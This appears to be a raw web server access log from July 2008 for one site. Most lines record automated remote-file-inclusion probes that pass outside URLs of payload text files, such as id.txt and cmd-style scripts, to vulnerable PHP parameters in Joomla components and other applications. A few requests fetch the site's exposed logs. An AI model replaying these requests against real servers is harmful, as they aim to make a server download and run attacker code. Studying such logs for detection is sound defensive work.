77.221.130.15 - - [14/Jul/2008:10:43:18 -0700] "GET //errors.php?error=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.10.95 - - [14/Jul/2008:10:43:30 -0700] "GET //?base_folder=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 200 18427 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.10.95 - - [14/Jul/2008:10:43:31 -0700] "GET /logs//?base_folder=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 200 56141 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.10.95 - - [14/Jul/2008:10:43:34 -0700] "GET /logs/access_080103.log//?base_folder=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.10.95 - - [14/Jul/2008:10:43:36 -0700] "GET /logs/access_080104.log//?base_folder=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:10:43:39 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:10:43:40 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:43:49 -0700] "GET /logs/access_080329.log//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:43:50 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:43:50 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.63 - - [14/Jul/2008:10:43:51 -0700] "GET /logs//components/com_simpleboard/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.63 - - [14/Jul/2008:10:43:52 -0700] "GET //components/com_simpleboard/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:43:58 -0700] "GET /logs/access_080329.log//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:44:02 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:44:03 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.246 - - [14/Jul/2008:10:44:15 -0700] "GET /bikes/cb750K6/?S=A HTTP/1.0" 200 1610 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.67.20.124 - - [14/Jul/2008:10:44:16 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.124 - - [14/Jul/2008:10:44:16 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.124 - - [14/Jul/2008:10:44:17 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:44:25 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:44:26 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:44:27 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:44:43 -0700] "GET /logs/access_080329.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:44:43 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:44:44 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:44:49 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:44:50 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:44:51 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.245.192.26 - - [14/Jul/2008:10:45:11 -0700] "GET //components/errors.php?error=http://bropix.com/templates/colora.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:45:16 -0700] "GET /logs/access_080315.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.227.218.118 - - [14/Jul/2008:10:45:16 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://knightkittens.com/images/ma??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:45:17 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:45:17 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.227.218.118 - - [14/Jul/2008:10:45:19 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://knightkittens.com/images/ma??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:45:45 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.141.234.2 - - [14/Jul/2008:10:45:45 -0700] "GET /index1.php?p=http://users5.TitanicHost.com/onix2131/cmda.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.204.5.199 - - [14/Jul/2008:10:46:07 -0700] "HEAD /bikes/dteel/2008-05-30/CreSTOC_076M.jpg HTTP/1.1" 200 0 "-" "User-Agent: BoardReader-Image-Fetcher /1.0 info@boardreader.com" "www.dmulk.com"
74.204.5.199 - - [14/Jul/2008:10:46:08 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_076M.jpg HTTP/1.1" 200 24103 "-" "User-Agent: BoardReader-Image-Fetcher /1.0 info@boardreader.com" "www.dmulk.com"
84.44.160.130 - - [14/Jul/2008:10:46:19 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.44.160.130 - - [14/Jul/2008:10:46:20 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:46:23 -0700] "GET /logs/access_080313.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:46:29 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:46:50 -0700] "GET /logs/access_080313.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.214.192.29 - - [14/Jul/2008:10:46:55 -0700] "GET /logs/access_080128.log/?REX[INCLUDE_PATH]=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [14/Jul/2008:10:46:55 -0700] "GET /logs/?REX[INCLUDE_PATH]=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 200 56136 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [14/Jul/2008:10:46:57 -0700] "GET /?REX[INCLUDE_PATH]=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 200 18421 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.10.95 - - [14/Jul/2008:10:46:58 -0700] "GET /logs/access_080127.log//?base_folder=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.10.95 - - [14/Jul/2008:10:47:02 -0700] "GET /logs/access_080201.log//?base_folder=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.119.120.253 - - [14/Jul/2008:10:47:12 -0700] "GET /logs/access.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.firestormmedia.com/modules/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.63 - - [14/Jul/2008:10:47:38 -0700] "GET /logs//components/com_simpleboard/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.63 - - [14/Jul/2008:10:47:39 -0700] "GET //components/com_simpleboard/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.28.163 - - [14/Jul/2008:10:47:51 -0700] "GET //trans/trans.php?trans=en&page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:10:47:53 -0700] "GET /logs//login.php?dir=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:10:47:53 -0700] "GET /logs//login.php?dir=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:10:47:53 -0700] "GET //login.php?dir=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:10:47:53 -0700] "GET //login.php?dir=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:47:55 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:47:59 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:48:00 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.238.20 - - [14/Jul/2008:10:48:29 -0700] "GET /logs/access_080128.log/?REX[INCLUDE_PATH]=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [14/Jul/2008:10:48:29 -0700] "GET /logs/?REX[INCLUDE_PATH]=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 200 56136 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [14/Jul/2008:10:48:30 -0700] "GET /?REX[INCLUDE_PATH]=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 200 18421 "-" "libwww-perl/5.812" "www.dmulk.com"
72.55.146.38 - - [14/Jul/2008:10:48:34 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [14/Jul/2008:10:48:35 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:10:48:37 -0700] "GET /index.php?pageurl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18415 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:10:48:42 -0700] "GET /index.php?pageurl=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 200 18395 "-" "libwww-perl/5.79" "www.dmulk.com"
92.114.163.184 - - [14/Jul/2008:10:49:00 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:10:49:00 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:10:49:00 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:49:27 -0700] "GET /logs/access_080315.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.179.0.195 - - [14/Jul/2008:10:49:28 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:49:28 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:49:28 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.179.0.195 - - [14/Jul/2008:10:49:31 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [14/Jul/2008:10:49:35 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
74.6.22.88 - - [14/Jul/2008:10:49:36 -0700] "GET /blog/index.php/2008/04/12/ HTTP/1.0" 200 9284 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
195.56.55.6 - - [14/Jul/2008:10:49:37 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
69.57.189.226 - - [14/Jul/2008:10:50:11 -0700] "GET /doceboLms/class/class.dashboard_lms.php?where_framework=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:10:50:23 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:10:50:23 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:10:50:24 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:10:50:24 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:10:50:28 -0700] "GET /logs//calendar.php?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:10:50:28 -0700] "GET /logs//calendar.php?p=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:10:50:29 -0700] "GET //calendar.php?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:10:50:29 -0700] "GET //calendar.php?p=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.6.22.88 - - [14/Jul/2008:10:50:30 -0700] "GET /blog/index.php/2008/04/12/ HTTP/1.0" 200 9284 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
203.130.242.135 - - [14/Jul/2008:10:51:12 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.130.242.135 - - [14/Jul/2008:10:51:13 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:10:51:15 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:10:51:16 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:10:51:16 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:10:51:16 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.70.36.107 - - [14/Jul/2008:10:51:26 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [14/Jul/2008:10:51:27 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [14/Jul/2008:10:51:27 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.88 - - [14/Jul/2008:10:51:39 -0700] "GET /blog/index.php/2008/04/12/ HTTP/1.0" 200 9284 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
195.70.36.107 - - [14/Jul/2008:10:51:41 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:51:53 -0700] "GET /logs/access_080315.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:51:54 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:51:54 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.117.241.196 - - [14/Jul/2008:10:51:55 -0700] "GET /logs/access_080207.log//errors.php?error=http://www.colegiomedsegpontevedra.com/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:51:56 -0700] "GET /logs/access_080313.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.241.196 - - [14/Jul/2008:10:51:56 -0700] "GET //errors.php?error=http://www.colegiomedsegpontevedra.com/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.241.196 - - [14/Jul/2008:10:51:57 -0700] "GET /logs//errors.php?error=http://www.colegiomedsegpontevedra.com/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.57.189.226 - - [14/Jul/2008:10:52:12 -0700] "GET /logs/access_080313.log/doceboCms/class/class.dashboard_lms.php?where_framework=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.189.226 - - [14/Jul/2008:10:52:16 -0700] "GET /logs/access_080228.log/config.inc.php?path_escape=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.189.226 - - [14/Jul/2008:10:52:17 -0700] "GET /doceboCms/class/class.dashboard_lms.php?where_framework=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.189.226 - - [14/Jul/2008:10:52:23 -0700] "GET /logs/doceboCms/class/class.dashboard_lms.php?where_framework=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.85.130.159 - - [14/Jul/2008:10:52:40 -0700] "GET /logs/access_080329.log//administrator/components/com_dbquery/classes/DBQ/admin/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [14/Jul/2008:10:52:40 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [14/Jul/2008:10:52:41 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:52:52 -0700] "GET /logs/access_080329.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:52:52 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:52:53 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:53:12 -0700] "GET /logs/access_080218.log/players-detail.php?id=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:53:12 -0700] "GET /players-detail.php?id=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:53:12 -0700] "GET /logs/players-detail.php?id=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
